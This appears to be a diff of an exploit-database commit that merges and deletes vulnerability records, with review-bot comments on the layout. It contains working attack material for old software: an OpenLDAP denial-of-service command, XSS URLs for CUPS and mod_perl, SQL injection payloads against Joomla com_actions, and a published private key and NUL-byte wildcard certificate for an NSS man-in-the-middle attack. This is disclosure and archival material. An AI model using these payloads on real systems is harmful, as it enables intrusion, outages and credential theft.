expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
|
||||
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
|
||||
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
|
||||
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
|
||||
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY RESEARCH TEAM
|
||||
DOMAIN: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
|
||||
|
|
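Review bot: The risk rating in this advisory contradicts its own proof of concept: the session log line `GET http://localhost:80/createdir?path=%2F%3E%22%3C-[CODE EXECUTION VULNERABILITY!];%3E` creates a folder whose name is then written unescaped into the `fileListTable_0_0` name cell of index.html (the `>-[CODE EXECUTION VULNERABILITY!]>` row), and the Solution section itself asks to encode the name value; that is a stored HTML/script injection in the wifi web interface, not code execution on the device. If this record is kept, the title, the `Vulnerable Parameter(s)` section and the "critical" CVSS 8.8 rating should describe an application-side script injection via `createdir?path=`, and the fix should cover both halves: validate the folder name server-side (reject path separators and HTML metacharacters such as `<`, `>` and `"`) and HTML-encode the name when rendering the listing.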
@ -1,4 +1,4 @@
|
|||
source: http://securityreason.com/securityalert/8003
|
||||
// source: http://securityreason.com/securityalert/8003
|
||||
|
||||
-----BEGIN PGP SIGNED MESSAGE-----
|
||||
Hash: SHA1
|
||||
|
|
|
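Review bot: Prefixing the source line with `//` (the `+` line in this hunk) treats the file as C-style source, but the unchanged context lines directly below are `-----BEGIN PGP SIGNED MESSAGE-----` and `Hash: SHA1`, which no compiler accepts anyway; the edit is therefore either incomplete (the PGP wrapper would also have to be commented out, the way the arrayd hunk later in this commit wraps its header in `/* ... */`) or unnecessary, in which case the plain `source:` form used by the other text files in this commit is the consistent choice. The `//` line sits above the signed block, so the signed text itself is unaffected.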
@ -1,11 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/27778/info
|
||||
|
||||
OpenLDAP is prone to a remote denial-of-service vulnerability.
|
||||
|
||||
Attackers can exploit this issue to deny service to legitimate users.
|
||||
|
||||
OpenLDAP 2.3.39 is vulnerable to this issue; other versions may also be affected.
|
||||
|
||||
This issue is related to one described in BID 26245 (OpenLDAP Multiple Remote Denial of Service Vulnerabilities), identified by CVE-2007-6698.
|
||||
|
||||
ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2
|
|
@ -1,155 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/35888/info
|
||||
|
||||
Mozilla Network Security Services (NSS) is prone to a security-bypass vulnerability because it fails to properly validate the domain name in a signed CA certificate, allowing attackers to substitute malicious SSL certificates for trusted ones.
|
||||
|
||||
The NSS library is used by a number of applications, including Mozilla Firefox, Thunderbird, and SeaMonkey.
|
||||
|
||||
Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks.
|
||||
|
||||
NOTE (August 6, 2009): This BID had included a similar issue in Fetchmail, but that issue is now documented in BID 35951 (Fetchmail NULL Character CA SSL Certificate Validation Security Bypass Vulnerability).
|
||||
|
||||
Private-Key: (1024 bit)
|
||||
modulus:
|
||||
00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
|
||||
5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
|
||||
c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
|
||||
6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
|
||||
72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
|
||||
29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
|
||||
bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
|
||||
93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
|
||||
ce:f0:82:33:d8:76:06:4c:9f
|
||||
publicExponent: 65537 (0x10001)
|
||||
privateExponent:
|
||||
00:8c:4f:3b:7c:ba:ee:bc:ea:ee:d6:58:7d:61:ff:
|
||||
3d:35:9e:21:3f:35:87:a9:80:67:59:e1:26:8e:09:
|
||||
6f:4b:1d:6f:4d:8b:11:7a:04:49:fc:d2:ef:50:dc:
|
||||
51:e0:ce:65:52:f2:6f:8d:cc:bd:86:15:90:8a:11:
|
||||
c5:d9:5e:ba:fc:2b:fc:e3:a0:cd:c8:f0:9a:05:76:
|
||||
06:82:07:a9:bd:14:cc:c7:7e:54:b9:32:5b:40:7a:
|
||||
35:0a:26:80:d7:30:98:d6:b7:71:d5:9d:f4:0d:f2:
|
||||
28:b5:a9:0c:2e:6d:78:19:86:a9:31:b0:a1:43:1c:
|
||||
57:2c:78:a9:42:b2:49:d8:71
|
||||
prime1:
|
||||
00:ec:07:79:1d:e2:50:14:77:af:99:18:1b:14:d4:
|
||||
0c:25:0c:20:26:0d:dd:c7:75:0e:08:d3:77:72:ce:
|
||||
2d:57:80:9d:18:bb:60:7b:b2:62:4e:21:a1:e6:84:
|
||||
96:91:31:15:cc:5b:89:5b:5a:83:07:96:51:e4:d4:
|
||||
e6:3a:40:99:03
|
||||
prime2:
|
||||
00:e0:d7:5a:07:0e:cc:a6:17:22:f8:ec:51:b1:7b:
|
||||
17:af:3a:87:7b:f1:e4:6d:40:48:28:d2:c0:9c:93:
|
||||
e0:f1:8f:79:07:8f:00:e0:49:1d:0e:8c:65:41:ba:
|
||||
c8:20:e2:ae:78:54:75:6b:f0:41:e5:d1:9c:2e:23:
|
||||
49:79:53:35:35
|
||||
exponent1:
|
||||
15:17:15:db:75:bd:72:16:bf:ba:0e:4d:5d:2f:15:
|
||||
66:ba:0e:a5:57:d7:d9:5a:bc:46:4d:9e:fe:c3:2d:
|
||||
8a:04:14:05:81:b8:bd:54:d3:33:e8:0d:6f:6b:a9:
|
||||
88:8f:ba:42:e8:6a:fd:9e:b8:d6:94:b7:fc:9a:89:
|
||||
77:eb:0d:c1
|
||||
exponent2:
|
||||
5c:5a:38:61:63:c3:cd:88:fd:55:6f:84:12:b9:73:
|
||||
be:06:f5:75:84:a3:05:f8:fc:6a:c0:3e:5b:52:26:
|
||||
78:32:2d:4d:5c:80:c8:9f:5f:6f:05:5d:e6:04:b9:
|
||||
85:40:76:d7:78:21:8f:07:6d:99:df:62:1e:55:62:
|
||||
2d:92:6e:ed
|
||||
coefficient:
|
||||
00:c5:62:ea:ee:85:5c:eb:e6:07:12:58:a5:63:5a:
|
||||
8f:e3:b3:df:c5:1e:cc:01:cd:87:d4:12:3f:45:8e:
|
||||
a9:4c:83:51:31:5a:e5:8d:11:a1:e3:84:b8:b4:e1:
|
||||
12:33:eb:2d:4c:4e:8c:49:e2:0d:50:aa:ca:38:e3:
|
||||
e6:c2:29:86:17
|
||||
Certificate Request:
|
||||
Data:
|
||||
Version: 0 (0x0)
|
||||
Subject: C=US, CN=*\x00thoughtcrime.noisebridge.net, ST=California, L=San Francisco, O=Noisebridge, OU=Moxie Marlinspike Fan Club
|
||||
Subject Public Key Info:
|
||||
Public Key Algorithm: rsaEncryption
|
||||
RSA Public Key: (1024 bit)
|
||||
Modulus (1024 bit):
|
||||
00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
|
||||
5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
|
||||
c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
|
||||
6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
|
||||
72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
|
||||
29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
|
||||
bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
|
||||
93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
|
||||
ce:f0:82:33:d8:76:06:4c:9f
|
||||
Exponent: 65537 (0x10001)
|
||||
Attributes:
|
||||
a0:00
|
||||
Signature Algorithm: md5WithRSAEncryption
|
||||
64:e6:b2:77:45:74:c3:dc:f6:3d:e7:73:7f:0f:fb:dd:d7:30:
|
||||
c3:0f:30:d5:52:2c:6b:41:ad:40:2b:4b:07:2a:de:80:69:d4:
|
||||
a7:0b:6f:ed:cc:62:e7:4d:e1:fc:1e:81:0d:94:b9:c8:9b:14:
|
||||
0a:10:d4:8e:f9:53:76:11:51:1d:c9:80:ca:15:e5:78:02:e1:
|
||||
d1:89:95:b5:4a:3f:e0:f7:f3:35:ad:1f:7d:85:5b:8c:f5:de:
|
||||
70:05:8f:4f:1d:cb:23:83:dd:63:b7:2f:1a:8c:a1:3c:67:d9:
|
||||
f9:fc:63:c0:dc:bb:72:56:13:f6:3d:db:8e:d5:dc:01:9a:20:
|
||||
a2:dc
|
||||
-----BEGIN RSA PRIVATE KEY-----
|
||||
MIICXQIBAAKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+tw
|
||||
B5hPHgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQ
|
||||
E9aJn70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQAB
|
||||
AoGBAIxPO3y67rzq7tZYfWH/PTWeIT81h6mAZ1nhJo4Jb0sdb02LEXoESfzS71Dc
|
||||
UeDOZVLyb43MvYYVkIoRxdleuvwr/OOgzcjwmgV2BoIHqb0UzMd+VLkyW0B6NQom
|
||||
gNcwmNa3cdWd9A3yKLWpDC5teBmGqTGwoUMcVyx4qUKySdhxAkEA7Ad5HeJQFHev
|
||||
mRgbFNQMJQwgJg3dx3UOCNN3cs4tV4CdGLtge7JiTiGh5oSWkTEVzFuJW1qDB5ZR
|
||||
5NTmOkCZAwJBAODXWgcOzKYXIvjsUbF7F686h3vx5G1ASCjSwJyT4PGPeQePAOBJ
|
||||
HQ6MZUG6yCDirnhUdWvwQeXRnC4jSXlTNTUCQBUXFdt1vXIWv7oOTV0vFWa6DqVX
|
||||
19lavEZNnv7DLYoEFAWBuL1U0zPoDW9rqYiPukLoav2euNaUt/yaiXfrDcECQFxa
|
||||
OGFjw82I/VVvhBK5c74G9XWEowX4/GrAPltSJngyLU1cgMifX28FXeYEuYVAdtd4
|
||||
IY8HbZnfYh5VYi2Sbu0CQQDFYuruhVzr5gcSWKVjWo/js9/FHswBzYfUEj9FjqlM
|
||||
g1ExWuWNEaHjhLi04RIz6y1MToxJ4g1Qqso44+bCKYYX
|
||||
-----END RSA PRIVATE KEY-----
|
||||
-----BEGIN CERTIFICATE REQUEST-----
|
||||
MIIB3jCCAUcCADCBnjELMAkGA1UEBhMCVVMxJzAlBgNVBAMUHioAdGhvdWdodGNy
|
||||
aW1lLm5vaXNlYnJpZGdlLm5ldDETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UE
|
||||
BxMNU2FuIEZyYW5jaXNjbzEUMBIGA1UEChMLTm9pc2VicmlkZ2UxIzAhBgNVBAsT
|
||||
Gk1veGllIE1hcmxpbnNwaWtlIEZhbiBDbHViMIGfMA0GCSqGSIb3DQEBAQUAA4GN
|
||||
ADCBiQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hP
|
||||
HgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJ
|
||||
n70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABoAAw
|
||||
DQYJKoZIhvcNAQEEBQADgYEAZOayd0V0w9z2Pedzfw/73dcwww8w1VIsa0GtQCtL
|
||||
ByregGnUpwtv7cxi503h/B6BDZS5yJsUChDUjvlTdhFRHcmAyhXleALh0YmVtUo/
|
||||
4PfzNa0ffYVbjPXecAWPTx3LI4PdY7cvGoyhPGfZ+fxjwNy7clYT9j3bjtXcAZog
|
||||
otw=
|
||||
-----END CERTIFICATE REQUEST-----
|
||||
-----BEGIN CERTIFICATE-----
|
||||
MIIGTjCCBbegAwIBAgIDExefMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC
|
||||
RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD
|
||||
VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl
|
||||
Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl
|
||||
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl
|
||||
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3
|
||||
DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwNzMwMDcxNDQyWhcNMTEwNzMw
|
||||
MDcxNDQyWjCBnjELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU
|
||||
BgNVBAcTDVNhbiBGcmFuY2lzY28xFDASBgNVBAoTC05vaXNlYnJpZGdlMSMwIQYD
|
||||
VQQLExpNb3hpZSBNYXJsaW5zcGlrZSBGYW4gQ2x1YjEnMCUGA1UEAxQeKgB0aG91
|
||||
Z2h0Y3JpbWUubm9pc2VicmlkZ2UubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
|
||||
iQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hPHgXQ
|
||||
82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJn70H
|
||||
Z/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABo4IDITCC
|
||||
Ax0wCQYDVR0TBAIwADARBglghkgBhvhCAQEEBAMCBkAwCwYDVR0PBAQDAgP4MBMG
|
||||
A1UdJQQMMAoGCCsGAQUFBwMBMB0GA1UdDgQWBBStfpIwBXE+eXWUWtE3s5JqXon2
|
||||
TzAfBgNVHSMEGDAWgBQOB2DUOckbW12QeyPI0jSdSppGOTAJBgNVHREEAjAAMBwG
|
||||
A1UdEgQVMBOBEWdlbmVyYWxAaXBzY2EuY29tMHIGCWCGSAGG+EIBDQRlFmNPcmdh
|
||||
bml6YXRpb24gSW5mb3JtYXRpb24gTk9UIFZBTElEQVRFRC4gQ0xBU0VBMSBTZXJ2
|
||||
ZXIgQ2VydGlmaWNhdGUgaXNzdWVkIGJ5IGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS8w
|
||||
LwYJYIZIAYb4QgECBCIWIGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIv
|
||||
MEMGCWCGSAGG+EIBBAQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAy
|
||||
L2lwc2NhMjAwMkNMQVNFQTEuY3JsMEYGCWCGSAGG+EIBAwQ5FjdodHRwczovL3d3
|
||||
dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jldm9jYXRpb25DTEFTRUExLmh0bWw/MEMG
|
||||
CWCGSAGG+EIBBwQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jl
|
||||
bmV3YWxDTEFTRUExLmh0bWw/MEEGCWCGSAGG+EIBCAQ0FjJodHRwczovL3d3dy5p
|
||||
cHNjYS5jb20vaXBzY2EyMDAyL3BvbGljeUNMQVNFQTEuaHRtbDCBgwYDVR0fBHww
|
||||
ejA5oDegNYYzaHR0cDovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL2lwc2NhMjAw
|
||||
MkNMQVNFQTEuY3JsMD2gO6A5hjdodHRwOi8vd3d3YmFjay5pcHNjYS5jb20vaXBz
|
||||
Y2EyMDAyL2lwc2NhMjAwMkNMQVNFQTEuY3JsMDIGCCsGAQUFBwEBBCYwJDAiBggr
|
||||
BgEFBQcwAYYWaHR0cDovL29jc3AuaXBzY2EuY29tLzANBgkqhkiG9w0BAQUFAAOB
|
||||
gQAjzXaLBu+/+RP0vQ6WjW/Pxgm4WQYhecqZ2+7ZFbsUCMJPQ8XE2uv+rIteGnRF
|
||||
Zr3hYb+dVlfUnethjPhazZW+/hU4FePqmlbTtmMe+zMLThiScyC8y3EW4L4BZYcp
|
||||
p1drPlZIj2RmSgPQ99oToUk5O6t+LMg1N14ajr9TpM8yNQ==
|
||||
-----END CERTIFICATE-----
|
|
@ -1,12 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/36958/info
|
||||
|
||||
|
||||
CUPS is prone to a cross-site scripting vulnerability because the software fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
NOTE: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.
|
||||
|
||||
This issue affects versions prior to CUPS 1.4.2.
|
||||
|
||||
http://www.example.com/admin/?kerberos=onmouseover=alert
|
|
@ -1,42 +0,0 @@
|
|||
1 ########################################## 1
|
||||
0 I'm Sid3^effects member from Inj3ct0r Team 1
|
||||
1 ########################################## 0
|
||||
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
|
||||
|
||||
Name : I-net Multi User Email Script SQLi Vulnerability
|
||||
Date : june, 27 2010
|
||||
Critical Level : HIGH
|
||||
Vendor Url : http://www.i-netsolution.com/
|
||||
Google Dork: inurl:/jobsearchengine/
|
||||
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
|
||||
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
|
||||
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
|
||||
#######################################################################################################
|
||||
|
||||
Description:
|
||||
i-Net Multi User Email Script to start your own Email Website like GMAIL, YAHOO Mail, Hot Mail made in CGI/PERL, tested over Linux
|
||||
|
||||
Servers. Features of i-Net Multi User Email Script, Advanced Spam Filtering, RBL Blacklisting, Completely MIME compatible, Contact List
|
||||
|
||||
Members Filter Proof, Multiple Skins, Limit Users Outgoing Mail (Depending on User Level) Sort Inbox With Several Criteria, Fully
|
||||
|
||||
customizable via HTML templates, Mod_Perl Compatible, New Mail Sounds, WYSIWYG Mail Interface, Multiple Tiered Premium Accounts, Premium
|
||||
|
||||
Accounts using Paypal & Subscriptions, SMTP or Send mail, Fully functional calendar and scheduler, Unlimited User Folders, Folder Filtering
|
||||
|
||||
(Incoming mail directed to specific folders), Email notifications of new mail, MySQL backend, Backup, Powerful Admin Panel, Ban IP, Advanced
|
||||
|
||||
User Editing, Account Suspensions, User Address Book, i-Net Talk and many more features.
|
||||
|
||||
#######################################################################################################
|
||||
|
||||
Xploit: SQLi VUlnerability
|
||||
|
||||
|
||||
The I-net Multi User Email Script has SQli vuln :D
|
||||
|
||||
DEMO URL : http://xxxx.com/php121_editname.php?uid=[sqli]
|
||||
|
||||
###############################################################################################################
|
||||
# 0day no more
|
||||
# Sid3^effects
|
|
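Review bot: This file is dropped outright rather than merged into a sibling file like the neighbouring deletions, so the `php121_editname.php?uid=` record leaves the database with no surviving copy in the visible hunks. The removal is defensible on content grounds (the file carries a `Google Dork` line and greetings but no affected version, vendor fix or actual query), but the commit message (`DB: 2016-07-11`) should name the entry it is deduplicated against, if any, so the deletion is traceable.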
@ -1,3 +1,15 @@
|
|||
Attackers use readily available LDAP commands to exploit this issue. The following command demonstrates this issue:
|
||||
Attackers use readily available LDAP commands to exploit this issue.
|
||||
|
||||
ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2
|
||||
|
||||
|
||||
source: http://www.securityfocus.com/bid/27778/info
|
||||
|
||||
OpenLDAP is prone to a remote denial-of-service vulnerability.
|
||||
|
||||
Attackers can exploit this issue to deny service to legitimate users.
|
||||
|
||||
OpenLDAP 2.3.39 is vulnerable to this issue; other versions may also be affected.
|
||||
|
||||
This issue is related to one described in BID 26245 (OpenLDAP Multiple Remote Denial of Service Vulnerabilities), identified by CVE-2007-6698.
|
||||
|
||||
ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2
|
|
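Review bot: After this hunk the command `ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2` appears twice in the file (line 3 and the final `+` line), because the entire body of the deleted `bid/27778` file, command included, is appended after the existing PoC; the trimmed first line also drops "The following command demonstrates this issue:", leaving the first copy with no lead-in. Keep one copy: place the `source:` line and the description at the top, as the other merged files in this commit do, followed by the single command. The empty host in `-h :389` and the `<dn>`/`<pw>` placeholders come from the original advisory and should stay as placeholders.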
@ -2,4 +2,18 @@ Attackers can exploit this issue by enticing an unsuspecting victim into followi
|
|||
|
||||
The following example URI is available:
|
||||
|
||||
http://www.example.com/admin/?kerberos=onmouseover=alert
|
||||
http://www.example.com/admin/?kerberos=onmouseover=alert
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
source: http://www.securityfocus.com/bid/36958/info
|
||||
|
||||
CUPS is prone to a cross-site scripting vulnerability because the software fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
NOTE: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.
|
||||
|
||||
This issue affects versions prior to CUPS 1.4.2.
|
|
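Review bot: The `-`/`+` pair for `http://www.example.com/admin/?kerberos=onmouseover=alert` changes nothing visible, so it is almost certainly a trailing-newline or line-ending difference; confirm that is intended. The larger point is layout: the moved description block (`source:` through "This issue affects versions prior to CUPS 1.4.2.") is appended after the example URI behind a run of blank lines, so the file now reads PoC first and background last, the reverse of the `source:`-first layout used by the other merged files in this commit. Moving the block above the existing first line ("Attackers can exploit this issue by enticing ...") and dropping the blank-line run would keep the records uniform.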
@ -1,3 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/35888/info
|
||||
|
||||
Mozilla Network Security Services (NSS) is prone to a security-bypass vulnerability because it fails to properly validate the domain name in a signed CA certificate, allowing attackers to substitute malicious SSL certificates for trusted ones.
|
||||
|
||||
The NSS library is used by a number of applications, including Mozilla Firefox, Thunderbird, and SeaMonkey.
|
||||
|
||||
Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks.
|
||||
|
||||
NOTE (August 6, 2009): This BID had included a similar issue in Fetchmail, but that issue is now documented in BID 35951 (Fetchmail NULL Character CA SSL Certificate Validation Security Bypass Vulnerability).
|
||||
|
||||
Private-Key: (1024 bit)
|
||||
modulus:
|
||||
00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
|
||||
|
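Review bot: The ten lines inserted ahead of the unchanged `Private-Key: (1024 bit)` dump describe the bug only indirectly ("fails to properly validate the domain name", plus the Fetchmail BID title's "NULL Character"), while the key and CSR that follow are the NUL-prefix wildcard demonstration whose `Subject` line carries `CN=*\x00thoughtcrime.noisebridge.net`, as the moved file's own content shows. One sentence stating that the attached CSR's CN contains an embedded NUL, and that the file also includes the corresponding CA-issued certificate and its intentionally published private key, would make the record self-explanatory for a reader who opens only this file.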
@ -142,4 +152,4 @@ BgEFBQcwAYYWaHR0cDovL29jc3AuaXBzY2EuY29tLzANBgkqhkiG9w0BAQUFAAOB
|
|||
gQAjzXaLBu+/+RP0vQ6WjW/Pxgm4WQYhecqZ2+7ZFbsUCMJPQ8XE2uv+rIteGnRF
|
||||
Zr3hYb+dVlfUnethjPhazZW+/hU4FePqmlbTtmMe+zMLThiScyC8y3EW4L4BZYcp
|
||||
p1drPlZIj2RmSgPQ99oToUk5O6t+LMg1N14ajr9TpM8yNQ==
|
||||
-----END CERTIFICATE-----
|
||||
-----END CERTIFICATE-----
|
||||
|
|
|
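Review bot: The only change in this hunk is `-----END CERTIFICATE-----` removed and re-added identically, which is invisible in the rendered diff and normally means a missing trailing newline or a CRLF/LF change. Confirm it is deliberate; if the goal is a consistent end-of-file newline, applying it across all the moved files at once would avoid further one-line noise hunks like this one.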
@ -1,6 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/530/exploit
|
||||
/*
|
||||
source: http://www.securityfocus.com/bid/530/info
|
||||
|
||||
The SGI Array Services provide a mechanism to simplify administering and managing an array of clustered systems. The arrayd(1m) program is part of the array_services(5) and is known as the array services daemon. The default configuration for authorization makes clustered systems vulnerable to remote root compromises. The array services are installed on Irix systems by default from the Irix applications CD. All versions of Unicos post 9.0.0 are vulnerable.
|
||||
*/
|
||||
|
||||
/*## copyright LAST STAGE OF DELIRIUM aug 1999 poland *://lsd-pl.net/ #*/
|
||||
/*## arrayd #*/
|
||||
|
|
|
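Review bot: Wrapping the `source:` line and the SGI arrayd description in `/* ... */` is the right choice for a C exploit source file, and it is the convention the `DEVMODE dm = {0};` file later in this commit should follow as well. Two minor points: the URL changes from `/bid/530/exploit` to `/bid/530/info`, consistent with the other `source:` edits but losing the direct pointer to the page the PoC came from, and the description is a single very long line inside the comment; wrapping it like the `/*## ... #*/` LSD header directly below would keep the file readable.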
@ -1,4 +1,4 @@
|
|||
source: http://www.securityfocus.com/bid/5829/exploit
|
||||
source: http://www.securityfocus.com/bid/5829/info
|
||||
|
||||
Monkey HTTP server is prone to cross site scripting vulnerabilities.
|
||||
|
||||
|
|
|
@ -1 +1,7 @@
|
|||
http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
|
||||
source: http://www.securityfocus.com/bid/34383/info
|
||||
|
||||
The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
|
|
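Review bot: This hunk re-adds, around the single URL line the file previously held, the exact content of the `bid/34383` file deleted in the `@ -1,7 +0,0 @@` hunk later in this commit, so it is a merge of two records for the same mod_perl XSS; the `-`/`+` pair for the otherwise unchanged `http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E` line again indicates only a line-ending or trailing-newline change. Recording the merge in the commit message (currently just `DB: 2016-07-11`) would make the duplicate removal traceable.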
@ -1,34 +0,0 @@
|
|||
[~]######################################### InformatioN #############################################[~]
|
||||
|
||||
[~] Title : Joomla Component com_actions SQL Injection Vulnerability
|
||||
[~] Author : DevilZ TM By D3v1l
|
||||
[~] Homepage : http://www.DEVILZTM.com
|
||||
[~] Email : Expl0it@DevilZTM.Com
|
||||
[~] Contact : D3v1l.blackhat@yahoo.com
|
||||
|
||||
[~]######################################### ExploiT #############################################[~]
|
||||
|
||||
[~] Vulnerable File :
|
||||
|
||||
http://127.0.0.1/index.php?option=com_actions&actionid=[SQL]
|
||||
|
||||
[~] ExploiT :
|
||||
|
||||
-1 UNION SELECT 1,2,3,4,5,6,7--
|
||||
|
||||
[~] Example :
|
||||
|
||||
http://127.0.0.1/index.php?option=com_actions&actionid=-1 UNION SELECT 1,2,3,4,5,6,7--
|
||||
|
||||
|
||||
[~]######################################### ThankS To ... ############################################[~]
|
||||
|
||||
[~] Special Thanks To My Best FriendS :
|
||||
|
||||
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
|
||||
|
||||
[~] IRANIAN Young HackerZ
|
||||
|
||||
[~] GreetZ : Exploit-DB TeaM
|
||||
|
||||
[~]######################################### FinisH :D #############################################[~]
|
|
